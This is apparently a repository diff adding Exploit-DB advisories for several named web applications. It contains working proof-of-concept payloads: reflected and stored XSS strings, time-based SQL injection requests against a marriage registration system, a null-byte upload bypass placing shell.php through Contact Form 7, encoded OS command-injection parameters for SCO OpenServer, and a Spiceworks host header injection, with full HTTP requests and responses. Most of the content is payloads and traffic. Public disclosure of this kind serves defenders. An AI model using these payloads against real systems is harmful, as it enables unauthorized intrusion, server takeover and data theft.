exploits/multiple/webapps/49303.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20141
Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OLAPTool")><!--

15
exploits/multiple/webapps/49304.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20142
Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17.
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OpenRemoteCSV")><!--

15
exploits/multiple/webapps/49305.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20139
Cross Site Scripting (XSS) vulnerability in the Remote JSON component
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OpenRemoteJSON")><!--

37
exploits/php/webapps/49294.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
# Date: 12/20/2020
# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
# Vendor Homepage: https://contactform7.com
# Software Link: https://wordpress.org/plugins/contact-form-7/
# Version: 5.3.1 and below
# Tested on: Windows 10 1909, Ubuntu 20.4
Explanation
---------------------------------------------------------------------
ContactForm7 version 5.3.1 and below doesn't properly sanitize
uploaded filenames to prevent Arbitrary File Upload that can lead
to full server takeover in the worst-case scenario.
This happens in the wpcf7_antiscript_file_name function, that fails
to sanitize the provided filename if it ends with any Unicode special
character ranging from U+0000 (null) to U+001F (us).
The function matches both the file name and the file extension against
an exclusion regex. Appending any unicode special character to the
file extension results in a complete bypass of this verification (as
the regex doesn't match) leading to the Unrestricted File Upload.
Exploit
---------------------------------------------------------------------
1. Change the file extension of the file you want to upload (e.g:
"shell.php") to its equivalent with the special character ending (in
this case "shell.php" (appended U+0000))
2. Upload the file using ContactForm7 file upload feature in the
target website.
3. Go to <target.com>/wp-content/uploads/wpcf7_uploads/shell.php
Note the special character at the end
Note that the file upload location may vary as it is configurable.
4. Now you have uploaded your file!

20
exploits/php/webapps/49296.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-21
# Google Dork: N/A
# Vendor Homepage: http://codekernel.net/
# Software Link: https://codecanyon.net/item/queue-management-system/22029961
# Affected Version: Version 4.0.0
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as admin.
Step 2. Select "Users" from menu and click on "Add User .
Step 3. Insert payload - "><svg/onload=alert(1)> in "Firtst Name" , " Last
Name "and " Email ".
Step 4. Now open "User List " from menu and you will get alert box.

18
exploits/php/webapps/49306.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-18
# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on "Suppliers" in header and select "Add Supplier".
Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form.
Note: Stored XSS vulnerability can also be found "Customers Page" when you select "Add New Customer". Apply Same method above to execute Stored XSS.
Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Suppliers Page", your XSS Payloads will be triggered.
Note: Stored XSS can also be triggered when you click on "Products Page" and select "Add New Product".

91
exploits/php/webapps/49307.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Date: 12-21-2020
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
I DESCRIPTION
========================================================================
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.
Following the vulnerable code:
$sdata=$_POST['searchdata'];
?>
<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
<table id="datatable1" class="table display responsive nowrap">
<thead>
<tr>
<th class="wd-15p">S.No</th>
<th class="wd-15p">Reg Number</th>
<th class="wd-20p">Husband Name</th>
<th class="wd-10p">Date of Marriage</th>
<th class="wd-10p">Status</th>
<th class="wd-25p">Action</th>
</tr>
</thead>
<tbody>
<?php
$uid=$_SESSION['omrsuid'];
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
II PROOF OF CONCEPT
========================================================================
## Request user
POST /omrs/user/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/user/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"
-----------------------------197361427118054779422510078884--
## Request admin
POST /omrs/admin/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/admin/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"
-----------------------------267799269040335247322746025522--

128
exploits/sco/webapps/49300.txt Normal file
View file

@ -0,0 +1,128 @@
# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 14/06/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25495
*************************************************************************************************************************************
Vulnerability :Refelected XSS & HTML Injection
*************************************************************************************************************************************
A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
Affected Paramenter: section
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
Host: 192.168.20.48:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Thu, 03 Sep 2020 17:08:51 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2680
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title>
<META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'>
<link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body bgcolor="#FFFFFF" topmargin="0" marginheight="0">
<!-- Begin DocView navigation toolbar -->
<!--htdig_noindex-->
<table
class=dvtb
width="100%"
cellpadding=0
cellspacing=0
border=0
style="padding: 0;"
>
<tr valign=top class=dvtb>
<td class=dvdb>
<table
class=dvtb
cellpadding=3
cellspacing=1
border=0
bgcolor=#FFFFFF
width=611
>
<tr class=dvtb>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
DOC HOME
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SITE MAP
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
MAN PAGES
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
GNU INFO
</a></td>
<td class=dvtb align=center style="background: #2059A6;">
<a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
SEARCH
</a></td>
</tr>
</table>
</td>
<td class=dvtb align="left" width=100%>
<table
class=dvtb
cellpadding="3"
cellspacing="1"
border="0"
width="100%"
bgcolor="#FFFFFF"
>
<tr class=dvtb valign="top">
<td class=dvtb style="background: #2059A6;" align=center width=100%>
<a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" >
&nbsp;
</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!--/htdig_noindex-->
<!-- End DocView navigation toolbar -->
<h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE>
</PRE>
</body></html>

51
exploits/sco/webapps/49301.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 04/09/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products/
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25494
*************************************************************************************************************************************
Vulnerability :OS Command Injection
*************************************************************************************************************************************
The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name. Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request.
Affected URL:http://host:8457/cgi-bin/printbook
Affected Paramenter: outputform, toclevels
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
POST /cgi-bin/printbook HTTP/1.1
Host: 10.0.0.45:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.45:8457/en/Navpages/printmap.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.
*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2020 11:17:52 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 3188

352
exploits/windows/webapps/49299.txt Normal file
View file

@ -0,0 +1,352 @@
# Exploit Title: Spiceworks 7.5 - HTTP Header Injection
# Google Dork: inurl:/pro_users/login
# Discovered Date: 15/09/2020
# Exploit Author: Ramikan
# Vendor Homepage: https://www.spiceworks.com
# Affected Version: 7.5.7.0 may be others.
# Tested On Version: 7.5.7.0
# CVE : CVE-2020-25901
Vulnerability: Host Header Injection
Description:
Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack.
Request:
GET / HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 302 Found
Date: Tue, 15 Sep 2020 12:46:52 GMT
Cache-Control: no-cache
X-Runtime: 0
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Location: http://google.com/pro_users/login
Content-Length: 99
Connection: close
Content-Type: text/html; charset=utf-8
<html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html>
Request:2
GET /pro_users/login HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1
Response:2 (Forgot your password)Link replaced with domain in the header.
HTTP/1.1 200 OK
Date: Tue, 15 Sep 2020 12:48:26 GMT
Cache-Control: private, max-age=0, must-revalidate
X-UA-Compatible: IE=edge,chrome=1
X-Runtime: 0
ETag: "77c8f98180ec3f6d4f2fcc8dcd796462"
Set-Cookie: compatibility_test=testing; path=/
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Content-Length: 9875
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html>
<html lang="en" class="no-js desktop">
<head>
<meta charset="utf-8" />
<title>Spiceworks</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<meta name="author" content="Spiceworks, Inc." />
<meta name="description" content="Network management made simple" />
<meta name="version" content="unknown" />
<noscript>
<meta http-equiv="refresh" content="2;url=/sessions/incompatible" />
</noscript>
<link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" />
<link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" />
<link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" type="text/css" />
<link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" />
<link href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" />
<script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-314222-21']);
_gaq.push(['_setDomainName', 'none']);
_gaq.push(['_setAllowLinker', true]);
_gaq.push(['_trackPageview']);
_gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]);
_gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]);
_gaq.push(['_setCustomVar', 3, '_u', '2', 3]);
_gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]);
_gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); });
document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); });
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
(function($){
$(document).ready(function(){
$('#flash-notice-message').delay(9000).slideUp(300);
});
})(jQuery);
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var gekko = gekko || {};
gekko.cmd = gekko.cmd || [];
gekko.times = gekko.times || [];
gekko.times.push({ gekkoRequest: new Date().getTime() });
gekko.client = gekko.client || {};
gekko.client.app = {
'id': 'SWD',
'env': 'p',
'version': '7.5.00070'
};
gekko.client.user = {};
gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03';
//]]>
</script>
<script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script>
<script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script>
<script type="text/javascript">
//<![CDATA[
gekko.cmd.push({cmd: function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true});
//]]>
</script>
<script>
var SWUFR = SWUFR || {};
SWUFR.cmd = SWUFR.cmd || [];
</script>
<script async src="//gekko.spiceworks.com/swufr.js"></script>
<script>
SWUFR.cmd.push(function() {
SWUFR.ufr.installed()
});
</script>
</head>
<!--[if lt IE 7]> <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]-->
<!--[if IE 7]> <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]-->
<!--[if IE 8]> <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]-->
<!--[if IE 9]> <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]-->
<!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]-->
<header class="site-navigation sui-opt-in">
<nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length="">
<div class="nav-fluid-container">
<a href="/" class="global-nav_brand">Home</a>
<img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' />
</div>
</nav>
</header>
<!--[if lte IE 9]>
<div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body">
<img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; ">
<div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px">
<p style="padding-top:10px; font-size:13px">Yeaaaah… what's happening? </p>
<p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p>
<p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p>
</div>
<div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;">
<h4 class="">
<strong>
Whoops, looks like you might have gotten stuck.
</strong>
</h4>
</div>
<div class="footer-actions blue-permission-granted">
<a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a>
</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
jQuery(function(){
SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'});
jQuery('#install_chrome_frame').modal();
})
function upgradeIE(){
SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'});
window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie";
}
//]]>
</script> <![endif] -->
<div class="sui-fluid-container">
<div id="content">
<img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" />
<div id="container">
<div id="wrapper">
<div id="float-msg">
<h1>Spiceworks is ready to rock!</h1>
<p>Please enter your login credentials.</p>
</div>
<div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div>
</div><div class="main">
<div id="flash-container-for-sessions-new">
</div>
<form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div>
<div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div>
<div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div>
<div class="control-group controls forgot_password">
<a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a>
</div>
<div class=" control-group"><div class="controls">
<label class='checkbox'>
<input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" />
Stay logged in
</label>
</div></div>
<div class=" control-group"><div class="controls">
<button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button>
</div></div>
</form>
</div></div></div>
</div>
</div>
</div>
</div>
<div id="footer">
<hr/>
<span class="pull-left">
<p>Copyright &copy; 2006-16 Spiceworks, Inc.</p>
</span>
<span class="pull-right">
<p>
<a href="https://www.spiceworks.com/about/">About</a> &bull;
<a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull;
<a href="https://www.spiceworks.com/terms/">Terms</a> &bull;
<a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a>
</p>
</span>
</div>
<script src="/assets/wizard.js?7500070" type="text/javascript"></script>
</body>
</html>

15
files_exploits.csv
View file

@ -39381,6 +39381,10 @@ id,file,description,date,author,type,platform,port
43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
43667,exploits/php/webapps/43667.txt,"Zomato Clone Script - Arbitrary File Upload",2018-01-17,Tauco,webapps,php,
